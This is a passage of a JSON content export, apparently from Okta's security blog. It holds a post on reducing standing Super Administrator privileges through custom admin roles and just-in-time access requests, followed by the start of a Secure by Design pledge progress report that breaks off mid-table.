permissions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for several such tasks or “jobs to be done” so that they can be assigned to a role.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The use of specific permissions to create \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/custom-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"custom admin roles\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" can dramatically reduce the number of accounts with standing 
access to highly privileged permissions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The next step is to use Okta’s governance features to restrict those rarely used and highly privileged permissions to an access request flow. Using these features, an administrative user must request and be approved via dual authorization to perform tasks that require a privileged permission. Once approved, the user can only use the permission for a set period of time before their account reverts to its standing role.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In this post, we’ll cover the first step in the process: identifying permissions that help to reduce the use of the most privileged role in Okta, the Super Administrator role.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1 - JIT permission to modify an Identity Provider \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The ability to create or modify a third party identity provider fits squarely into the category of a highly-privileged and intermittent administrative task. Until recently, this task required an account with a Super Administrator or Org Administrator role. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So this task makes an ideal candidate use case for governing Okta admin roles. 
It’s especially prudent to lock down this permission given \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"adversarial interest\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in abusing trust relationships for impersonating users in downstream applications. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recommend creating a custom admin role scoped to the Manage Identity Providers permission (okta.identityProviders.manage) that is available on a JIT basis, subject to approval workflows, and which expires after a few hours.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Further, it’s good practice to turn on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/admin-console-protected-actions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"protected actions\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to ensure that any Identity Provider lifecycle event (adding or modifying identity providers) will first trigger a step-up authentication challenge.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2 - JIT permission to modify AD/LDAP Agents\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"After initial setup of an Okta Org, administrators should not need to create or modify new directory agents frequently. 
If your org has enabled auto-updates for \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/directory/agent-auto-update-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"AD agents\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/directory/ldap/agent-auto-update-ldap.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"LDAP agents\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", there is limited agent maintenance required via the Okta Admin Console or Management APIs.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creating or modifying agents has historically required an account with the Super Administrator role.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"You can avoid using Super Administrator by:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creating a custom admin role scoped to the Manage Agent permission (okta.agents.manage),\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creating an \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/governance-admin-roles/ar-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access Request flow\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that provides this role 
on a JIT basis, subject to approval workflows, and which expires after a few hours,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Assign a group of trusted administrators to request and approve this access.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Important: if you still use Active Directory, you reduce the number of service accounts that use the Super Administrator role (by at least 1!) by simply upgrading to Version 3.18 of the AD Agent. From Version 3.18, the AD Agent uses OAuth 2.0 Demonstrating Proof-of-Possession (DPoP) to communicate with Okta, and is no longer bound to a specific administrative user account.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3 - JIT permission to modify Workflows\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s no-code automation tool, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/au/platform/workflows/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Workflows\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", is a powerful application and an addictive administrative experience for administrators that want to automate identity-related operations without writing code. Given the breadth of tasks an administrative user can automate with Workflows, creating and modifying a Workflow historically required the Super Administrator role. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The great news is, you don’t need the Super Admin role for this any longer!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/content/topics/workflows/access-control/access-control-get-started.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Role-Based Access Control for Workflows\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (now in Early Access) provides a choice of three distinct roles scoped exclusively to the Workflows app. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Workflows Administrator\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" is assigned within the Okta Admin Console, and provides administration capabilities within Workflows. This role can be requestable using Okta's ability to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/governance-admin-roles/govern-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"govern Okta admin roles\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Workflows Connection Manager\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" is a permission assigned within Okta Workflows, and grants the ability to create or modify connections. 
This is useful for any service accounts required to authorize connections.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Workflows Auditor\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" is a permission assigned within Okta Workflows, that grants “read only” permissions to view everything in Okta Workflows, but no ability to modify anything.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While we’re on the subject, the Authentication Policy for the Workflows app should be at least as strong as what is required for access to the Okta Admin Console.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A least privilege approach to Workflows would be to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Create and test Workflows in your Preview or Test Org\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once the flow is ready for prime time, export it as a .flow or .folder file\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Request JIT access to the Workflows Administrator role using govern Okta admin roles in the production org \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Import the .flow or .folder file and configure any 
required connections\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Ensure that your production Workflows app has only been granted the OAuth scopes that your flows require.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4 - A Custom Admin Role to manage Access Requests\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/au/products/identity-governance/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Governance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" provides simple, convenient tools for taking the complexity out of tasks like managing user requests to access applications and running scheduled user access reviews (access certifications) as a layer of governance over that access.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From a security perspective, the ability to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"create\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" access request flows and modify their conditions is a fairly privileged affair. 
Out of the box, an Okta Org has a choice of two roles that can do this:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A user with the Super Administrator role, or\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A user with the Access Request Admin role \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"and\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" the Application Admin role for the application the flow provides access to. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creating a Custom Admin Role for the second option gives you everything you need to create and modify access requests, without the excessive permissions of a Super Administrator. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The one exception to this is if you’re using Access Requests to govern access to Okta Admin Roles, as opposed to user roles in downstream applications. This is where things start to get a bit \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"meta\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\". If as an administrator I have the ability to set the conditions via which a user can request access to a role with administrative permissions, I effectively have the same level of privileges as an administrator that can grant privileges directly. So to create and modify access requests for Okta admin roles, I must be a Super Administrator. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5 - Delegated Permission to Read or Invoke Workflows\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"More good news: you also no longer need Super Administrator permissions or Workflows RBAC permissions to simply invoke (run) a Workflow in Okta. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An administrator with lower permissions can invoke (run) a flow using a feature called \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/content/topics/workflows/access-control/access-control-permission-changes.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"delegated flows\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Using this feature, service desk personnel can be granted permission to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/content/topics/workflows/execute/run-delegated-flow.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"start\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" a specific flow using their limited access to the Okta Admin Console, without accessing the Workflows app directly. Service desk personnel won’t be able to modify or even view a flow assigned to them, but they can interact with it under whatever constraints you design. 
You can probably imagine any number of other use cases for this outside the Service Desk too.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"6 - Use API Service Integrations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Another way to avoid the use of the Super Administrator role is to embrace \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/build-api-integration/main/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"API Service Integrations\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", especially for security use cases.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Using API Service Integrations, access doesn’t require the role of a highly privileged service account created by a user. API Service Integrations access Okta APIs in the context of an application using the OAuth 2.0 Client Credentials flow. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/blog/2023/04/24/api-integrations\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"several reasons\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" why this delivers a stronger security outcome. 
Each access token enables the bearer to perform specific actions on specific Okta endpoints, instead of whatever actions are available under a role.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"You can generally judge a security vendor’s commitment to least privileges by whether they have an API Service Integration available. We’d like to give a big hat tip to Sysdig, Datadog, Kandji, Palo Alto, Elastic, Wiz and others that made this commitment good and early! \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"7 - Delegated Permission to Read Privileged Users\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given Okta’s commitment to least privilege access, an account with Super Administrator permissions is required to view or modify information about other Okta administrators. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As such, the standard Read Only Administrator role in Okta can view information on regular user accounts, but not information (such as assigned role, resource and permissions) about accounts with administrative permissions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As we mentioned above, third party security providers should use an OAuth-powered \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/build-api-integration/main/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"API Service Integration\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", which sets permissions at the application context and does not require a service account. 
API Service Integrations provide numerous advantages when it comes to reducing the blast radius of a stolen API token, as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/blog/2023/09/25/oauth-api-tokens\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"this blog\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" neatly summarizes. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"However, you may have observed other third-party security tools (such as posture management or “ITDR” apps) request that Okta customers create a service account assigned with the Super Administrator role, use this account to create a static API token, and hand over the token to the third-party for ongoing access. This integration pattern often results in over-privileged accounts. And it really doesn’t need to be this way.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If the vendor hasn’t built an API Service Integration and continues to insist on the use of static bearer tokens, you can most likely give the app a custom admin role and avoid using the Super Admin role. You might consider, for example, adding the identity and access management\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"permission (okta.iam.read) to the standard\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Read Only Administrator \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"role. 
The IAM permission provides read-only access to roles, resource sets, and admin assignments, without adding unnecessary attack surface.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Next steps \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So we’ve now established that a large number of tasks no longer require the Super Administrator role. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"However, we continue to need Super Admin to assign administrative permissions or to modify administrator accounts. That makes the Super Administrator role itself a prime candidate for a time-bound role, available on-demand after more than one other user in a trusted group of administrators approve the access using \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/governance-admin-roles/govern-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"govern Okta admin roles\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Your next task is to think about what \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"baseline\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" permissions you’ll give to groups of administrators at your organization. What are the tasks they perform so frequently, that it would be impractical to have to go through some form of access request every time? 
Don’t forget that you can bundle standard roles, custom roles and resources together to create a baseline role best suited to your organization’s structure and risk appetite.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In our next blog on identity governance, we’ll dive deeper into creating access requests using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/governance-admin-roles/govern-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"govern Okta admin roles\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" feature.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"The first step in your journey to Zero Standing Privileges is to reduce the standing assignment of highly privileged roles."},"updatedAt":"2025-02-09T23:55:08.837Z","secAuthor":[{"id":"4fcb85f0-473e-57ff-b1d4-6f7dc8281c69","bio":{"bio":"Kalpana has worked in product management roles at numerous technology startups prior to joining Okta in 2022. Kalpana has built product capabilities that enhance and protect the administrative experience in the Okta Workforce Identity Cloud, including for delegated administration, custom admin roles and protected actions. "},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6dS0ZBKl6KfE5MZFgQgzLR/b01384c225380a07bdf6d09c3378af0b/kalpana.png"},"name":"Kalpana Adlakha","jobTitle":"Senior Product Manager","slug":"/hackers/kalpana-adlakha","node_locale":"en"},{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"<p>Brett Winterford is Vice President of Okta Threat Intelligence.  Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats.  
Brett was previously the regional Chief Security Officer for Okta in Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. <br/> Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank.  Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/cisasecurebydesign1","id":"4db88005-1d91-5e97-bc6d-83e6171c1284","title":"Okta’s Ongoing Commitment to Secure By Design","date":"2024-10-31T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Introduction\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is determined to raise the bar for cloud security.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In May 2024, Okta was one of the first technology providers to sign the CISA Secure by Design pledge. The pledge commits enterprise software companies to make a “good faith” effort to meet seven high-level Secure by Design goals within the course of a year.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This document assesses Okta’s progress against this pledge. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To date, we have found it straightforward to demonstrate progress toward these goals in the vast majority of Okta products. We found it more challenging to be able to commit to achieving these goals in 100% of our products and operations. It has been a valuable exercise to hunt down and engineer solutions to those edge cases that prevent us from being able to state that we meet these goals \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"without exception\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-header-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Goal\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-header-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Status as at October 2024\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Drive Adoption of Multi-Factor Authentication\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On Track\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reduce use of default 
passwords\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Completed\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reduce common classes of vulnerabilities\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On Track\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Drive improved customer patching hygiene\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On Track\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Publish a Vulnerability Disclosure Policy\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Completed\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Provide transparency on 
